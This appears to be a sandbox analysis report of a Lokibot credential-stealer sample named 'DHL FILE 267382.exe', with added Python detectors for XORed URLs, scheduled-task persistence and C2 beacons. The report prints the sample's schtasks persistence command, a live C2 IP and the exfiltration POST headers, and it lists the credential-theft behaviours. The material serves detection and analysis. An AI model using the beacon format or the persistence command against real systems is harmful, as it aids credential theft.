Analysis Report DHL FILE 267382.exe

Overview

General Information

Sample Name: DHL FILE 267382.exe
Analysis ID: 299736
MD5: 72fb9a400177dfd9b010ed127537fe3e
SHA1: 27ed71ca36a0a51c746a033d86e664a0fc7615f5
SHA256: 0969f9b67bae5ccaa7d4b2fd6fa97a6f6accbc890711f6f3f9361302d9e832c4
Tags: DHL, exe, Loki

Detection

Lokibot
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • DHL FILE 267382.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\DHL FILE 267382.exe' MD5: 72FB9A400177DFD9B010ED127537FE3E)
    • schtasks.exe (PID: 6664 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x12d347:$des3: 68 03 66 00 00 (push 0x6603, the CryptoAPI CALG_3DES identifier)
  • 0x131738:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x131804:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00 (UTF-16 "-u", then ASCII "Fuckav.ru")
00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
(11 further memory-dump matches are collapsed in the original report)

Unpacked PEs

Source | Rule | Description | Author
3.2.DHL FILE 267382.exe.400000.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 ("http://" with every byte XORed by 0xFF)
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
3.2.DHL FILE 267382.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
3.2.DHL FILE 267382.exe.400000.0.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
3.2.DHL FILE 267382.exe.400000.0.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
3.2.DHL FILE 267382.exe.400000.0.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x12fff:$des3: 68 03 66 00 00 (push 0x6603, the CryptoAPI CALG_3DES identifier)
  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00 (UTF-16 "-u", then ASCII "Fuckav.ru")
(4 further unpacked-PE matches are collapsed in the original report)
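
The SUSP_XORed_URL_in_EXE hit above is worth reproducing by hand. The following scanner is an added example, not the Yara rule and not sandbox code: it generalises the rule's check to all 256 single-byte XOR keys and, unlike the rule, keeps decoding past the "http://" prefix to recover the whole string. The buffer it scans is constructed for the example; the plaintext URL in it is one the report lists under Networking, while the hidden host and path are placeholders, not this sample's C2.

```python
r"""Locate and decode single-byte-XOR-obscured URLs in a binary blob.

Added example; it is not the Yara rule and not sandbox code. The report's
SUSP_XORed_URL_in_EXE match lists, next to the plain "http://" strings, the
bytes \x97\x8B\x8B\x8F\xC5\xD0\xD0 at 0x18074: that is "http://" with every
byte XORed by 0xFF. This scanner tries all 256 one-byte keys and extends each
hit as long as the decoded bytes still look like URL text.
"""
import string
from typing import List, Tuple

PREFIXES = (b"http://", b"https://")
# RFC 3986 unreserved and reserved characters plus '%' for percent-encoding.
URL_BYTES = frozenset((string.ascii_letters + string.digits
                       + "-._~:/?#[]@!$&'()*+,;=%").encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the one-byte key."""
    return bytes(b ^ key for b in data)


def find_xored_urls(buf: bytes, max_len: int = 512) -> List[Tuple[int, int, str]]:
    """Return (offset, key, url) for every URL prefix found under any one-byte key.

    Key 0x00 covers plaintext URLs, so those are reported as well; a real
    sample typically yields a handful of key-0 hits and one or two keyed ones.
    """
    hits: List[Tuple[int, int, str]] = []
    for key in range(256):
        for prefix in PREFIXES:
            needle = xor_bytes(prefix, key)
            start = 0
            while (off := buf.find(needle, start)) != -1:
                # Extend past the prefix while the decoded byte is still URL text.
                end = off + len(needle)
                while (end < len(buf) and end - off < max_len
                       and (buf[end] ^ key) in URL_BYTES):
                    end += 1
                hits.append((off, key, xor_bytes(buf[off:end], key).decode("ascii")))
                start = off + 1
    return sorted(hits)


# Constructed test blob: a plaintext URL the report also lists, some padding,
# then a placeholder C2 URL hidden with key 0xFF exactly like the rule hit.
HIDDEN_URL = b"http://203.0.113.10/.op/cr.php"  # placeholder, not the sample's C2
SAMPLE = (
    b"\x00" * 16
    + b"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\x00"
    + b"\x90" * 8
    + xor_bytes(HIDDEN_URL + b"\x00", 0xFF)
    + b"\x00" * 8
)

if __name__ == "__main__":
    for off, key, url in find_xored_urls(SAMPLE):
        print(f"0x{off:05x} key=0x{key:02x} {url}")
```

Run against a real unpacked image, the key-0 hits are the ordinary strings and any non-zero key is the one to look at; the decoded run usually contains the panel path as well as the host, which is why decoding past the prefix matters.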

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started
Author: Joe Security
Data:
  Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
  CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: 'C:\Users\user\Desktop\DHL FILE 267382.exe'
  ParentImage: C:\Users\user\Desktop\DHL FILE 267382.exe
  ParentProcessId: 6600
  ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
  ProcessId: 6664
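
The Sigma hit above is easy to reproduce outside the sandbox. The detector below is an added example, neither Joe Sandbox nor Sigma code, applying equivalent logic to process-creation records (Sysmon event 1 or Security 4688 style). One detail the report's data makes visible: the command line names System32\schtasks.exe but the Image is SysWOW64\schtasks.exe, because the 32-bit parent was redirected by WOW64, so the detector matches on the image file name rather than its directory. All records it runs over are constructed; the first reproduces the report's command line, the others are benign contrasts.

```python
"""Flag scheduled tasks registered from an XML definition in a temp directory.

Added example; it is neither Joe Sandbox nor Sigma code. The input records,
field names and benign contrasts below are constructed for the example.
"""
import re
from typing import Dict, List, Optional

# User-writable scratch locations; a task definition read from here is suspicious.
TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%temp%", re.IGNORECASE)
# Double-quoted, single-quoted (as the sandbox renders them) or bare arguments.
QUOTED_OR_BARE = re.compile(r'''"[^"]*"|'[^']*'|\S+''')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted arguments whole."""
    return [t.strip("\"'") for t in QUOTED_OR_BARE.findall(cmdline)]


def option_value(tokens: List[str], name: str) -> Optional[str]:
    """Value following a schtasks switch such as /TN or /XML (case-insensitive)."""
    low = [t.lower() for t in tokens]
    for i, t in enumerate(low):
        if t == name.lower() and i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def scheduled_task_from_temp(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return alert details when schtasks /Create reads its XML from a temp path."""
    image = event.get("Image", "")
    # Match the file name only: a 32-bit parent gets SysWOW64\schtasks.exe
    # even when its command line says System32.
    if image.rsplit("\\", 1)[-1].lower() != "schtasks.exe":
        return None
    tokens = tokenize(event.get("CommandLine", ""))
    if "/create" not in (t.lower() for t in tokens):
        return None
    xml_path = option_value(tokens, "/XML")
    if xml_path is None or not TEMP_PATH.search(xml_path):
        return None
    return {
        "task_name": option_value(tokens, "/TN") or "<none>",
        "xml": xml_path,
        "parent": event.get("ParentImage", ""),
        "pid": event.get("ProcessId", ""),
    }


def run_detection(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the detector over a batch of process-creation records."""
    return [alert for alert in map(scheduled_task_from_temp, events) if alert]


# Constructed process-creation records.
EVENTS = [
    {   # the report's event, single quotes as the sandbox renders them
        "Image": r"C:\Windows\SysWOW64\schtasks.exe",
        "CommandLine": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' "
                       r"/XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'",
        "ParentImage": r"C:\Users\user\Desktop\DHL FILE 267382.exe",
        "ProcessId": "6664",
    },
    {   # benign: an installer registering a task from its own program directory
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Vendor\Updater" '
                       r'/XML "C:\Program Files\Vendor\updater-task.xml"',
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
        "ProcessId": "4100",
    },
    {   # benign: a query, not a creation
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks.exe /Query /TN "Updates\wmiRSwSoPk"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ProcessId": "4200",
    },
]

if __name__ == "__main__":
    for alert in run_detection(EVENTS):
        print(alert)
```

The task name and the parent image are kept in the alert because they are what an analyst pivots on next: the /TN value names the persistence entry to remove, and the parent identifies the dropper.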

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe; ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
Source: DHL FILE 267382.exe; ReversingLabs: Detection: 22%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: DHL FILE 267382.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49719 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49719 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49719 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49719 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49720 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49720 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49721 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49721 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 195.69.140.147:80
Source: Joe Sandbox View; IP Address: 195.69.140.147
Source: Joe Sandbox View; ASN Name: XSGGE
Source: global traffic; HTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: D947F2B4 | Content-Length: 192 | Connection: close
Source: global traffic; HTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: D947F2B4 | Content-Length: 192 | Connection: close
Source: global traffic; HTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: D947F2B4 | Content-Length: 165 | Connection: close
Source: global traffic; HTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: D947F2B4 | Content-Length: 165 | Connection: close
Source: unknown; TCP traffic detected without corresponding DNS query: 195.69.140.147 (39 identical entries; the C2 is addressed by hard-coded IP, so no DNS lookup precedes the connections)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 3_2_00404ED4 recv
Source: unknown; HTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: D947F2B4 | Content-Length: 192 | Connection: close
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 18 Oct 2020 06:34:06 GMT | Server: Apache | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Raw: a generic HTML "404 Not Found" page (hex dump omitted). This is the only server response recorded for the beacon POSTs.
Source: DHL FILE 267382.exe, 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL FILE 267382.exe, 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp; String found in binary or memory: http://www.ibsensoftware.com/ (the aPLib author's site, consistent with the aPLib Yara match)
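
The request headers printed above carry enough to recognise this beacon on the wire without a signature engine. The scorer below is an added example, not an Emerging Threats rule and not sandbox code; its indicators are read straight off the report's request block: a POST over HTTP/1.0, the "Mozilla/4.08 (Charon; Inferno)" User-Agent, a non-standard Content-Key header, an application/octet-stream body with Content-Encoding: binary, a Host that is a bare IP and a request target of the form /<dir>/<name>.php/<token>. Both requests it parses are constructed: the first reproduces the report's header block with a filler body (the sample's real body bytes are not on the page), the second is an ordinary browser request for contrast.

```python
"""Score raw HTTP requests for the beacon shape the report's Snort hits describe.

Added example; not an Emerging Threats rule and not part of the sandbox.
The two requests below are constructed for the example.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

# <script>.php/<token> request targets, as in /.op/cr.php/QHHu96pdPKrk1
PHP_TOKEN_TARGET = re.compile(r"\.php/[A-Za-z0-9]+$")


def parse_request(raw: bytes) -> Dict:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def is_bare_ip(host: str) -> bool:
    """True when the Host header carries an IP literal rather than a name.

    An IPv4 host:port suffix is stripped; bracketed IPv6 is not handled.
    """
    if host.count(":") == 1:
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_lokibot_beacon(req: Dict) -> Tuple[int, List[str]]:
    """Return (score, reasons); each reason is one header-level indicator."""
    h = req["headers"]
    reasons: List[str] = []
    ua = h.get("user-agent", "").lower()
    if "charon" in ua and "inferno" in ua:
        reasons.append("User-Agent 'Mozilla/4.08 (Charon; Inferno)' (the ET 2021641 indicator)")
    if "content-key" in h:
        reasons.append("non-standard Content-Key header")
    if req["method"] == "POST" and req["version"] == "HTTP/1.0":
        reasons.append("POST over HTTP/1.0")
    if (h.get("content-type", "").lower() == "application/octet-stream"
            and h.get("content-encoding", "").lower() == "binary"):
        reasons.append("binary octet-stream body")
    if is_bare_ip(h.get("host", "")):
        reasons.append("Host is a bare IP address")
    if PHP_TOKEN_TARGET.search(req["target"]):
        reasons.append("request target is <script>.php/<token>")
    return len(reasons), reasons


def classify(raw: bytes, threshold: int = 3) -> str:
    """Verdict for a raw request; the threshold keeps single weak hits quiet."""
    score, _ = score_lokibot_beacon(parse_request(raw))
    return "lokibot-c2-beacon" if score >= threshold else "benign"


# Constructed: the report's request line and headers, with a filler body of
# the advertised 192 bytes (the real payload bytes are not shown on the page).
BEACON = (
    b"POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: 195.69.140.147\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: D947F2B4\r\n"
    b"Content-Length: 192\r\n"
    b"Connection: close\r\n"
    b"\r\n" + bytes(192)
)

# Constructed benign browser request for contrast.
BROWSER = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/81.0\r\n"
    b"Accept: text/html\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for name, raw in (("beacon", BEACON), ("browser", BROWSER)):
        score, reasons = score_lokibot_beacon(parse_request(raw))
        print(f"{name}: {classify(raw)} (score {score})")
        for reason in reasons:
            print("  -", reason)
```

In practice the User-Agent alone is decisive for this family; the remaining indicators are there so that a variant which changes the agent string still scores above the threshold.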

System Summary:

Note: the submitted file is a .NET executable (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR present, mscorlib.ni.dll loaded). The Lokibot payload matched by the Yara rules is the native image at 0x400000 in the second DHL FILE 267382.exe instance (sandbox process 3), which fits the "Creates a process in suspended mode" signature listed above.

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Loki Payload, Author: kevoreilly
Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Loki Payload, Author: kevoreilly
Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 0_2_0179C124
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 0_2_0179E570
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 0_2_0179E560
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 3_2_0040549C
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 3_2_004029D4
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: String function: 00405B6F appears 42 times
Source: DHL FILE 267382.exe, 00000000.00000002.234261537.0000000004329000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.234261537.0000000004329000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameMARCUS.dll4 vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.236119428.0000000006300000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameB2B.exe4 vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.237012698.0000000006CD0000.00000002.00000001.sdmp; Binary or memory string: System.OriginalFileName vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.236241994.00000000063A0000.00000002.00000001.sdmp; Binary or memory string: originalfilename vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000000.00000002.236241994.00000000063A0000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe, 00000003.00000002.243530574.000000000071C000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
Source: DHL FILE 267382.exe; Binary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
Source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: DHL FILE 267382.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: wmiRSwSoPk.exe.0.dr; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine; Classification label: mal100.spyw.evad.winEXE@6/5@0/1
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; File created: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; File created: C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DHL FILE 267382.exe; ReversingLabs: Detection: 22%
Source: DHL FILE 267382.exe; String found in binary or memory: 9x+th+vJO+vC+vpy/t2jn/Z/17/vx+PAu+/G/vlx/Dh/jqPlvK/WP/add9/7o/zyvvP8Oe/16fPn/D8/z0D1/1//Ty/Nu/bt/HN/7Fje6BNz/28/fx/WP/na/Xt//Oz/389/Lj/vc/fe/fd+3fL6H/35/3j/3e3/72D//i+/trfs/f4/t1/Pe+v7+3trq/d9/10/T4//W/vF+/K//F//bz//83x/v48/R9/f8vu4/Jz/p0/dU0+/zZZz/efr/fU7fT97
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; File read: C:\Users\user\Desktop\DHL FILE 267382.exe
Source: unknown; Process created: C:\Users\user\Desktop\DHL FILE 267382.exe 'C:\Users\user\Desktop\DHL FILE 267382.exe'
Source: unknown; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
